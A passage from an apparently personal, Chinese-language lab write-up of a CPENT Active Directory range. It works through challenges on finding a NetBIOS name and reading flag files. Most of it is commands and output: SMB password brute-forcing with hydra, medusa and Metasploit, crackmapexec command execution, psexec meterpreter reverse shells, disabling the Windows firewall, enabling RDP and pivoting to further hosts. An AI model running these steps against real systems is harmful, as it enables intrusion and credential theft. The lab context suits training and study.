AD range (2)
接下來打172.25.170.90,相關問題如下:
10 (Challenge 9) What is the NetBIOS name of the machine located at 172.25.170.90?
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# nmap -p- 172.16.170.90
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 23:45 EDT
Stats: 0:00:52 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 38.98% done; ETC: 23:47 (0:01:21 remaining)
Nmap scan report for 172.16.170.90
Host is up (0.023s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49674/tcp open unknown
49721/tcp open unknown
49755/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 105.69 seconds
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666-49674,49721,49755 172.16.170.90 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 23:49 EDT
Nmap scan report for 172.16.170.90
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-02 03:49:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: CPENT.LOCALNET, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: LA)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: CPENT.LOCALNET, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp filtered unknown
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp filtered unknown
49672/tcp filtered unknown
49673/tcp filtered unknown
49674/tcp open msrpc Microsoft Windows RPC
49721/tcp open msrpc Microsoft Windows RPC
49755/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%), FreeBSD 6.X (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: Microsoft Windows Server 2016 (89%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FORESTB; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: ForestB
| NetBIOS computer name: FORESTB\x00
| Domain name: LA.CPENT.LOCALNET
| Forest name: CPENT.LOCALNET
| FQDN: ForestB.LA.CPENT.LOCALNET
|_ System time: 2023-04-01T20:50:08-07:00
| smb2-time:
| date: 2023-04-02T03:50:09
|_ start_date: 2023-03-26T12:59:28
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h20m00s, deviation: 4h02m30s, median: 0s
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 63.01 ms 192.168.200.1
2 63.03 ms 172.16.170.90
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.63 seconds
Challenge 9:
What is the NetBIOS name of the machine located at 172.25.170.90?
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: ForestB
| NetBIOS computer name: FORESTB\x00
| Domain name: LA.CPENT.LOCALNET
| Forest name: CPENT.LOCALNET
| FQDN: ForestB.LA.CPENT.LOCALNET
最上層是forest,再來是domain,最後是computer。所以某台電腦的全名(FQDN)就是(computer name).(domain name)。而NetBIOS name應該是domain name: LA
但上述判斷方式不靠譜,應該可以先猜測smb密碼,再利用crackmapexec工具來得知答案。猜測90的smb密碼:
┌──(root㉿kali)-[~]
└─# hydra -L /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt smb://172.16.170.90
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-23 01:17:11
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1820 login tries (l:35/p:52), ~1820 tries per task
[DATA] attacking smb://172.16.170.90:445/
[STATUS] 1.00 tries/min, 1 tries in 00:01h, 1819 to do in 30:20h, 1 active
[STATUS] 193.33 tries/min, 580 tries in 00:03h, 1240 to do in 00:07h, 1 active
[445][smb] host: 172.16.170.90 login: aspen password: cpent@123
[STATUS] 200.71 tries/min, 1405 tries in 00:07h, 415 to do in 00:03h, 1 active
[STATUS] 184.62 tries/min, 1477 tries in 00:08h, 343 to do in 00:02h, 1 active
也可以試試medusa這工具來爆破smb密碼:
┌──(root㉿kali)-[~]
└─# medusa -h 172.16.170.90 -U /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: 123456 (1 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: password (2 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: 12345678 (3 of 51 complete)
...
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: aspen (27 of 34, 26 complete) Password: cpent123 (40 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: aspen (27 of 34, 26 complete) Password: cpent@123 (41 of 51 complete)
ACCOUNT FOUND: [smbnt] Host: 172.16.170.90 User: aspen Password: cpent@123 [SUCCESS (ADMIN$ - Access Allowed)]
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: cpent (28 of 34, 27 complete) Password: 123456 (1 of 51 complete)
...
aaa如果不想看爆破過程,也可以加個pipe跟grep來過濾:
┌──(root㉿kali)-[~]
└─# medusa -h 172.16.170.90 -U /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt -M smbnt | grep FOUND
ACCOUNT FOUND: [smbnt] Host: 172.16.170.90 User: aspen Password: cpent@123 [SUCCESS (ADMIN$ - Access Allowed)]
注意要用虛擬機,不要透過moba。
爆出密碼後,就利用crackmapexec工具來找答案:
┌──(root㉿kali)-[~]
└─# crackmapexec smb -d . -u aspen -p 'cpent@123' -x "cmd.exe /c nbtstat -n" 172.16.170.90
SMB 172.16.170.90 445 FORESTB [*] Windows Server 2016 Datacenter 14393 x64 (name:FORESTB) (domain:.) (signing:True) (SMBv1:True)
SMB 172.16.170.90 445 FORESTB [+] .\aspen:cpent@123 (Pwn3d!)
SMB 172.16.170.90 445 FORESTB [+] Executed command
SMB 172.16.170.90 445 FORESTB Ethernet:
SMB 172.16.170.90 445 FORESTB Node IpAddress: [172.16.170.90] Scope Id: []
SMB 172.16.170.90 445 FORESTB
SMB 172.16.170.90 445 FORESTB NetBIOS Local Name Table
SMB 172.16.170.90 445 FORESTB
SMB 172.16.170.90 445 FORESTB Name Type Status
SMB 172.16.170.90 445 FORESTB ---------------------------------------------
SMB 172.16.170.90 445 FORESTB FORESTB <00> UNIQUE Registered
SMB 172.16.170.90 445 FORESTB LA <00> GROUP Registered
SMB 172.16.170.90 445 FORESTB LA <1C> GROUP Registered
SMB 172.16.170.90 445 FORESTB FORESTB <20> UNIQUE Registered
SMB 172.16.170.90 445 FORESTB LA <1B> UNIQUE Registered
答案是LA。
以下另一種麻煩方式,而且還失敗了。首先使用msf內的smb/psexec工具來建立session:
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search /smb/psexec
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
1 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
2 auxiliary/admin/smb/psexec_ntdsgrab normal No PsExec NTDS.dit And SYSTEM Hive Download Utility
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/admin/smb/psexec_ntdsgrab
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.18.193 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > set rhosts 172.16.170.90
rhosts => 172.16.170.90
msf6 exploit(windows/smb/psexec) > set lhost 192.168.200.7
lhost => 192.168.200.7
msf6 exploit(windows/smb/psexec) > set smbuser aspen
smbuser => aspen
msf6 exploit(windows/smb/psexec) > set smbpass cpent@123
smbpass => cpent@123
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.200.7:4444
[*] 172.16.170.90:445 - Connecting to the server...
[*] 172.16.170.90:445 - Authenticating to 172.16.170.90:445 as user 'aspen'...
[*] 172.16.170.90:445 - Selecting PowerShell target
[*] 172.16.170.90:445 - Executing the payload...
[+] 172.16.170.90:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.170.90
[*] Meterpreter session 1 opened (192.168.200.7:4444 -> 172.16.170.90:58279) at 2023-04-02 00:19:42 -0400
meterpreter >
使用靶機內的shell,但卻找不到nbtstat的指令?
meterpreter > shell
Process 3088 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>nbtstat -n
nbtstat -n
'nbtstat' is not recognized as an internal or external command,
operable program or batch file.
於是想從這shell來開啟3389服務,希望可以透過遠端操縱,但結論是有NLA所以無法。
Activate remote desktop from command line - RDR-IT
網頁內有以下指令直接拿來貼:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
打指令:
meterpreter > shell
Process 3088 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
google如何關掉防火牆:
指令如下
Netsh Advfirewall set allprofiles state off
打指令:
C:\Windows\system32>Netsh Advfirewall set allprofiles state off
Netsh Advfirewall set allprofiles state off
Ok.
接下來google如何關掉nla,但徒勞無功:
但NLA很難關掉。用linux的xfreerdp來解決問題,總之遠端失敗。
接下來以90為跳板,掃20跟70,相關問題如下:
11 (Challenge 10) What is the last four hex numbers for the hash of adminflag.txt file on machine 172.25.170.20? (Hint: SHA256 Hash)
12 (Challenge 11) What is the contents of the adminflagBRAVO.txt at machine 172.25.170.70?
離開90的shell後,用route add指令來讓攻擊機可以掃20跟70:
C:\Windows\system32>exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > route add 172.16.170.20/32 1
[*] Route added
msf6 exploit(windows/smb/psexec) > route add 172.16.170.70/32 1
[*] Route added
msf6 exploit(windows/smb/psexec) > route
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
172.16.170.20 255.255.255.255 Session 1
172.16.170.70 255.255.255.255 Session 1
[*] There are currently no IPv6 routes defined.
找到msf裡的TCP的port scan工具:
msf6 exploit(windows/smb/psexec) > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
3 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
4 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
7 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access
msf6 exploit(windows/smb/psexec) > use 5
msf6 auxiliary(scanner/portscan/tcp) > set ports 135,139,445,3389
ports => 135,139,445,3389
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 172.16.170.20
rhosts => 172.16.170.20
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 172.16.170.20: - 172.16.170.20:3389 - TCP OPEN
[+] 172.16.170.20: - 172.16.170.20:445 - TCP OPEN
[+] 172.16.170.20: - 172.16.170.20:139 - TCP OPEN
[+] 172.16.170.20: - 172.16.170.20:135 - TCP OPEN
[*] 172.16.170.20: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 172.16.170.90
rhosts => 172.16.170.90
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 172.16.170.90: - 172.16.170.90:3389 - TCP OPEN
[+] 172.16.170.90: - 172.16.170.90:445 - TCP OPEN
[+] 172.16.170.90: - 172.16.170.90:139 - TCP OPEN
[+] 172.16.170.90: - 172.16.170.90:135 - TCP OPEN
[*] 172.16.170.90: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
掃完20跟90後,可以發現的確都有開135,139,445,3389,而445是smb,所以用msf裡的猜smb帳密工具--smb_login:
msf6 auxiliary(scanner/portscan/tcp) > search smb login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms04_007_killbill 2004-02-10 low No MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow
1 exploit/windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/smb_shadow 2021-02-16 manual No Microsoft Windows SMB Direct Session Takeover
4 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner
5 auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt normal No SMB NTLMv1 Login Request Corruption
Interact with a module by name or index. For example info 5, use 5 or use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
msf6 auxiliary(scanner/portscan/tcp) > use 4
msf6 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 172.16.170.20
rhosts => 172.16.170.20
msf6 auxiliary(scanner/smb/smb_login) > set user_file /home/kali/LPT_day3/Usernames-CPENT.txt
user_file => /home/kali/LPT_day3/Usernames-CPENT.txt
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /home/kali/LPT_day3/Passwords-CPENT.txt
pass_file => /home/kali/LPT_day3/Passwords-CPENT.txt
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 172.16.170.20:445 - 172.16.170.20:445 - Starting SMB login bruteforce
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:123456',
[!] 172.16.170.20:445 - No active DB -- Credential data will not be saved!
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:password',
...
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:test123456',
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:victor',
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:puppettwo',
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:studentpw',
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:cpent123',
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:cpent@123',
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:cpent123456',
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:cpentpw',
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:admin',
[-] 172.16.170.20:445 - 172.16.170.20:445 - Failed: '.\administrator:admin123',
[+] 172.16.170.20:445 - 172.16.170.20:445 - Success: '.\administrator:Pa$$w0rd123456' Administrator
猜出密碼後,就找可以透過mb執行shell的工具,是下面的編號4
msf6 auxiliary(scanner/smb/smb_login) > search psexec
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
4 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
5 auxiliary/admin/smb/psexec_ntdsgrab normal No PsExec NTDS.dit And SYSTEM Hive Download Utility
6 exploit/windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token
7 encoder/x86/service manual No Register Service
8 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
9 exploit/windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution
10 exploit/windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution
Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/local/wmi
msf6 auxiliary(scanner/smb/smb_login) > use 4
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 172.16.170.20
rhosts => 172.16.170.20
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass Pa$$w0rd123456
smbpass => Pa$$w0rd123456
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.200.7:5555
[*] 172.16.170.20:445 - Connecting to the server...
[*] 172.16.170.20:445 - Authenticating to 172.16.170.20:445 as user 'administrator'...
[*] 172.16.170.20:445 - Selecting PowerShell target
[*] 172.16.170.20:445 - Executing the payload...
[+] 172.16.170.20:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.170.20
[*] Meterpreter session 3 opened (192.168.200.7:5555 -> 172.16.170.20:63375) at 2023-04-02 01:46:14 -0400
meterpreter >
成功拿到shell後就可以解下面題目,而這裡先用help看看有什麼指令可用。也輸入指令shell,直接使用windows的cmd:
Challenge 10:
What is the last four hex numbers for the hash of adminflag.txt file on machine 172.25.170.20? (Hint: SHA256 Hash) Ans: 3c18
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unic Disables encoding of unicode strings
ode_encoding
enable_unico Enables encoding of unicode strings
de_encoding
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_sen Send keystrokes
d
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_star Start capturing keystrokes
t
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_strea Play a video stream from the specified webcam
m
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > shell
Process 5612 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2114]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd /
cd /
C:\>cd users
cd users
C:\Users>cd administrator
cd administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 689D-43B7
Directory of C:\Users\Administrator
10/15/2022 08:09 AM <DIR> .
10/15/2022 08:09 AM <DIR> ..
10/14/2022 03:49 AM <DIR> 3D Objects
10/15/2022 08:09 AM 10 adminflag.txt.txt
10/14/2022 03:49 AM <DIR> Contacts
10/14/2022 03:49 AM <DIR> Desktop
10/14/2022 03:49 AM <DIR> Documents
10/14/2022 03:49 AM <DIR> Downloads
10/14/2022 03:49 AM <DIR> Favorites
10/14/2022 03:49 AM <DIR> Links
10/14/2022 03:49 AM <DIR> Music
10/14/2022 03:49 AM <DIR> Pictures
10/14/2022 03:49 AM <DIR> Saved Games
